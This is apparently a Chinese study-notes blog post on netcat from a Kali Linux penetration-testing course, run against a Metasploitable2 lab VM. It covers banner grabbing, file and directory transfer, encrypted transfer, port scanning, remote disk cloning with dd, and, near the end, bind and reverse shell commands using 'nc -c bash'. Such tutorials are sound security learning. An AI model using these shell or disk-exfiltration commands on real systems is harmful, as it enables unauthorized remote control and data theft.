1. 程式人生 > >kali linux 滲透測試 第五章 netcat--nc

kali linux 滲透測試 第五章 netcat--nc

繼續記筆記~~~

有了netcat,可以不用telnet了
nc的作用:
偵聽模式 / 傳輸模式
telnet / 獲取banner資訊
傳輸文字資訊
傳輸檔案/目錄
加密傳輸文檔案
遠端控制/木木⻢馬
加密所有流量
流媒體伺服器
遠端克隆硬碟

-v:顯示詳細的連線資訊(輸出內容)
-n:不會進行DNS解析

例如nc 隔壁伺服器metasploitable2的域名

root@quedgee:~# nc -vn 172.16.43.139 80
(UNKNOWN) [172.16.43.139] 80 (http) open

當輸入head,則返回標頭檔案

[email protected]
:~# nc -vn 172.16.43.139 80 (UNKNOWN) [172.16.43.139] 80 (http) open head <html><head><title>Metasploitable2 - Linux</title></head><body> <pre> _ _ _ _ _ _ ____ _ __ ___ ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \ | '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) | | | | | | | __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | | __// __/ |_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____| |_| Warning: Never expose this VM to an untrusted network! Contact: msfdev[at]metasploit.com Login with msfadmin/msfadmin to get started </pre
>
<ul> <li><a href="/twiki/">TWiki</a></li> <li><a href="/phpMyAdmin/">phpMyAdmin</a></li> <li><a href="/mutillidae/">Mutillidae</a></li> <li><a href="/dvwa/">DVWA</a></li> <li><a href="/dav/">WebDAV</a
>
</li> </ul> </body> </html>

若要實現“聊天”功能,在兩臺機器上使用與演示:
A(伺服器):先要開放(偵聽)一個埠
B(客戶):作為客戶端連線,產生tcp的連線
(333代指某一個埠)
A:nc -l -p 333
B:nc -vn 1.1.1.1 333

在伺服器端 nc -l -p 333 開啟後,可以用以下命令檢視333埠是否開啟

root@quedgee:~# netstat -pantu | grep 333
tcp        0      0 0.0.0.0:333             0.0.0.0:*               LISTEN      3730/nc  

發現是LISIEN的,於是可以在另一臺機子(客戶)上使用

root@quedgee:~# nc -vn 192.168.153.141 333
(UNKNOWN) [192.168.153.141] 333 (?) open

於是可以開始進行通訊了
客戶端輸入hello,伺服器端收到並返回個what
客戶端:

root@quedgee:~# nc -vn 192.168.153.141 334
(UNKNOWN) [192.168.153.141] 334 (?) open
hello
what?

伺服器端:

root@quedgee:~# nc -l -p 334
hello
what?

通過這些功能實現電子取證
比方我想在客戶端傳輸檔案

root@quedgee:~# ls -l | nc -vn 192.168.153.141 335
(UNKNOWN) [192.168.153.141] 335 (?) open

伺服器端會有(條件是伺服器端得先開啟埠偵聽)

root@quedgee:~# nc -l -p 335
總用量 4540
-rw------- 1 root root 5578752 1021 21:28 core
drwxr-xr-x 2 root root    4096 1021 21:34 Desktop
drwxr-xr-x 3 root root    4096 117 18:42 Documents
drwxr-xr-x 2 root root    4096 1022 13:17 Downloads
drwxr-xr-x 2 root root    4096 422  2017 Music
drwxr-xr-x 2 root root    4096 1021 21:33 Pictures
drwxr-xr-x 2 root root    4096 422  2017 Public
drwxr-xr-x 2 root root    4096 422  2017 Templates
drwxr-xr-x 2 root root    4096 422  2017 Videos

如果我想把客戶端的程序資訊傳輸到伺服器端
客戶端:(-q 1 的意思是等一秒鐘自動斷開連線,表示已經完成)

root@quedgee:~# ps aux | nc -nv 192.168.153.141 333 -q 1
(UNKNOWN) [192.168.153.141] 333 (?) open

此時伺服器端已經生成了ps.txt

root@quedgee:~# nc -l -p 333 > ps.txt
root@quedgee:~# ls
core  Desktop  Documents  Downloads  Music  Pictures  ps.txt  Public  Templates  Videos

傳輸檔案
A:nc -lp 333 > 1mp4(如同一個可上傳檔案的ftp伺服器)
B:nc -vn 192.168.153.141 333 < 1.mp4 -q 1

傳輸端B

root@quedgee:~/Desktop# nc -vn 192.168.153.141 333 < 1.mp4 -q 1
(UNKNOWN) [192.168.153.141] 333 (?) open

接收端A

root@quedgee:~# nc -lp 333 > 1.mp4
root@quedgee:~# ls
1.mp4  Desktop    Downloads  Music     ps.txt  Templates
core   Documents  lsof.txt   Pictures  Public  Videos

接收端和傳輸端的角色可以互相轉換,倘若伺服器端開了埠並作為傳輸端,相當於是開了埠,等著有人來連線,一連線內容便流到客戶端

root@quedgee:~# nc -lp 333 < 1.mp4
root@quedgee:~/Desktop# nc -vn 192.168.153.141 333 > a.mp4 -q 1
(UNKNOWN) [192.168.153.141] 333 (?) open

客戶端一連線,就把伺服器端的1.mp4,儲存為a.mp4

傳輸目錄

A:tar -cvf - music/ | nc -lp 333 –q 1
B:nc -nv 1.1.1.1 333 | tar -xvf –

具體思路:伺服器端把music目錄打包後的結果傳到管道里,客戶端收到後解包
伺服器端:

[email protected]:~/Desktop# tar -cvf - music/ | nc -lp 333 -q 1
music/
music/a.mp4
music/1.mp4

客戶端:

[email protected]:~# nc -vn 192.168.153.141 333 | tar xvf -
(UNKNOWN) [192.168.153.141] 333 (?) open
music/
music/a.mp4
music/1.mp4
[email protected]:~# ls
1.mp4 Desktop Downloads music Pictures Public Videos
core Documents lsof.txt Music ps.txt Templates
[email protected]:~# cd music
[email protected]:~/music# ls -l
總用量 8
-rw-r–r– 1 root root 3 11月 7 21:26 1.mp4
-rw-r–r– 1 root root 3 11月 7 21:30 a.mp4

加密檔案傳輸:
和傳輸目錄的思想類似,例子是對稱加密演算法
在A 端解密,在B端加密

A:nc -lp 333 | mcrypt –flush -Fbqd -a rijndael-256 -m ecb > 1.mp4
B: mcrypt –flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv 1.1.1.1 333 -q 1

流媒體傳輸

A:cat 1.mp4 | nc -lp 333
B: nc -nv 1.1.1.1 333 | mplayer -vo x11 -cache 3000 -

伺服器端把1.mp4以流的形式一點一點“流進”客戶端
其中mplayer需要在kali上安裝

NC-埠掃描

  • z:埠掃描(探測tcp的埠)
    加上 -u:可以看所有UDP的埠
    比方說看自己的埠開啟狀態
root@quedgee:~# nc -vnz 192.168.153.141 1-100
(UNKNOWN) [192.168.153.141] 80 (http) open

nc的掃描功能只有-z,掃描功能不如nmap那麼全面

NC——遠端克隆硬碟
A: nc -lp 333 | dd of=/dev/sda
B: dd if=/dev/sda | nc -nv 1.1.1.1 333 –q 1
遠端電子子取證,可以將目標伺服器硬碟遠端複製,或者記憶體。
通過這種方法,拷貝的檔案的一模一樣
dd命令可以實現塊(硬碟)級別的複製
B端為被取證端,A端為接收端,相當於把B端的東西備份到A端

NC遠端控制
windows下是通過開啟本機的3389遠端桌面的埠,對伺服器進行遠端管理

正向:
• A:nc -lp 333 -c bash
• B:nc 1.1.1.1 333
反向:
• A:nc -lp 333
• B:nc 1.1.1.1 333 -c bash
• 注:Windows用使用者把bash改成cmd;

A 端(伺服器)先偵聽333埠,-c命令實現遠端控制,等著有人來連。連上後,通過在客戶端就可以檢視伺服器端的內容,比如ls,或者輸入 init6 命令重啟。

相關推薦

kali linux 滲透測試 netcat--nc

繼續記筆記~~~ 有了netcat,可以不用telnet了 nc的作用: 偵聽模式 / 傳輸模式 telnet / 獲取banner資訊 傳輸文字資訊 傳輸檔案/目錄 加密傳輸文檔案 遠端控制/木木⻢馬 加密所有流量 流媒體伺服器 遠端克隆

【安全牛學習筆記】Kali Linux滲透測試方法

信息安全 kali linux security+ 1.安全問題的根源①由於分層思想,導致每個層次的相關人員都只關心自己層次的工作,因此每個人認識系統都是片面的,而安全是全方位的,整體的,所以造成安全問題。②技術人員追求效率,導致只追求功能實現,而很容易忽略安全性的工作③由於人都是會犯錯誤的,因此

kali linux滲透測試——信息收集

新網數碼 例子 .cn 收集 主機 工具 dns服務 發送 分析 一.公開網站 我們可以通過公開網站收集目標域的有關信息,這樣我們不必向目標網絡直接發送數據,從而避免使目標察覺我們的行動。 自行百度,不再贅述。 二.域名的註冊信息 whois數據庫記錄有該域名的DNS

性能測試-Loadrunner亂碼解決方法

pos OS use ascii碼 post advance 問題 腳本 intern 亂碼產生: 1、錄制過程產生的亂碼 --》通過選項修改來解決: 本機默認編碼是針對中文的,GB系列格式,而錄制時不是中文格式的,如UTF-8,如何解決呢?第一種修改被測試系統的編碼為GB

Linux效能優化 效能工具:特定程序記憶體

5.1 Linux記憶體子系統        在診斷記憶體效能問題的時候,也許有必要觀察應用程式在記憶體子系統的不同層次上是怎樣執行的。在頂層,作業系統決定如何利用交換記憶體和實體記憶體。它決定應用程式的哪一塊地址空間將被放到實體記憶體中

Kali Linux 滲透測試:掃描漏洞

                                     Kali Lin

Kali linux滲透測試系列————28、Kali linux 滲透攻擊之社會工程學攻擊

社會工程學社會工程學是利用人性的弱點體察、獲取有價值資訊的實踐方法,它是一種期盼的藝術。在缺少目標系統的必要資訊時,社會工程學技術是滲透測試人員獲取資訊的至關重要的手段。對於素有型別的組織而言,人都是安全防範措施李最為薄弱的一個環節,也是整個安全基礎設施最脆弱的層面。從安全的

Kali Linux 滲透測試手冊(1.1)安裝虛擬機器

翻譯來自:掣雷小組 成員資訊: thr0cyte, Gr33k, 花花, 小丑, R1ght0us, 7089bAt, 一.配置KALI Linux和滲透測試環境 在這一章,我們將覆蓋以下內容: 在Windows和Linux上安裝VirtualBox 建立一個Kali L

【安全牛學習筆記】​Kali Linux滲透測試介紹

Kali Linux滲透測試介紹 安全問題的根源         優點:分工明確,工作效率高。(把大問題簡化成易於解決的小問題)         缺點:從業人員對系統沒有整體的認識,對安全認識較為片面。(搞技術的為了提高工作效率,只追求功能實現, 很少能在實現功能後

Kali linux滲透測試系列————23、Kali linux 滲透攻擊之伺服器端攻擊

漏洞評估伺服器端攻擊即找出並利用伺服器上的服務、埠和應用程式中的漏洞。舉個例子,Web伺服器都有多個攻擊途徑(Attack Vector)。它會執行一個作業系統,並執行各種各樣的軟體來提供Web功能。它會有很多開啟的TCP埠。這些途徑中的每一個都有可能找出一個攻擊者能利用的漏

Kali Linux滲透測試 021 主動資訊收集

本文記錄 Kali Linux 2018.1 學習使用和滲透測試的詳細過程,教程為安全牛課堂裡的《Kali Linux 滲透測試》課程 1. 簡介 直接與目標系統互動通訊 無法避免留下訪問的痕跡 使用受控的第三方電腦進行探測

Kali Linux滲透測試 101 手動漏洞挖掘-CSRF 漏洞

本文記錄 Kali Linux 2018.1 學習使用和滲透測試的詳細過程,教程為安全牛課堂裡的《Kali Linux 滲透測試》課程 1. 簡介 2. 判斷漏洞 3. 伺服器原始

Kali linux滲透測試系列————12、Kali linux資訊收集之作業系統識別

識別作業系統在確定目標主機線上之後,應當識別他們使用的作業系統。這階段工作通常稱為識別作業系統(也稱為作業系統指紋識別)。識別作業系統的方式有三種:主動式和被動式。主動式識別工具向目標主機發送資料包,並根據目標的響應來確定其使用的作業系統。這種方式的優點在於探測速度快,缺點是

Kali Linux滲透測試 045 讀取windows本地密碼

本文記錄 Kali Linux 2018.1 學習使用和滲透測試的詳細過程,教程為安全牛課堂裡的《Kali Linux 滲透測試》課程 1. 抓包嗅探 2. 鍵盤記錄本地密碼 3. 檢視本地快取密碼 4. WCE (WINDOWS

Kali linux滲透測試(一)

最近在學習kali,所以開個系列來記錄下吧 0x01 寫在前面 要養成從根源解決問題的習慣 安全問題的根源 分層思想的優劣(化整為零,把大化小,逐一實現) 只追求功能的實現(久而久之,眼光侷限,沒辦法看全域性,看整體——安全) 最大的安全威脅是人(人

【安全牛學習筆記】Kali Linux滲透測試介紹

​Kali Linux滲透測試介紹      安全問題的根源         優點:分工明確,工作效率高。         缺點:從業人員對系統沒有整體的認識,對安全認識較為片面。         最大威脅是人,人都會犯錯,安全問題不能100%絕對根除。    

Kali Linux滲透測試 049 清除痕跡

本文記錄 Kali Linux 2018.1 學習使用和滲透測試的詳細過程,教程為安全牛課堂裡的《Kali Linux 滲透測試》課程 1. 清除滲透攻擊痕跡 1.清除滲透攻擊痕跡 最多也只是清除本地記錄,如果有日誌伺服器的話還是會被

Kali linux滲透測試系列————34、Kali linux 維持訪問之建立Web後門

WeBaCooWeBaCoo(Web Backdoor Cookie)是一款隱蔽的指令碼類Web後門工具。藉助HTTP協議,它可以在客戶端和伺服器端實現執行程式碼的網頁終端。WeBaCoo有兩種工作模式:Generation(生產線模式):指定-g選項可進入這種模式。使用者可

Kali linux滲透測試系列————13、Kali linux資訊收集之埠掃描

埠掃描簡單來說埠掃描就是一種用來確定目標主機的TCP埠和UDP埠狀態的方法。主機開發了某個埠,就意味著他在中國埠提供某種網路服務。如果某個埠處於關閉狀態,這說明主機在這個埠上並沒有提供網路服務。在確定某埠開發狀態之後,攻擊人員就會檢查在該埠提供相應的服務的程式版本,以判斷這個

我的Kali Linux滲透測試學習之路

少壯不努力,老大徒傷悲。這句話時刻提醒著我,我是一名本科學生,自從今年我的同學把這一網站推薦了給我。通過我的同學說他不斷的聽課請教老師,能把多種知識融匯貫通,讓他感覺自己就像一個什麼都不懂的2B程式設計師成為一個網路大佬。現在我已經快畢業了,在安全牛課堂我打算學網路方面的知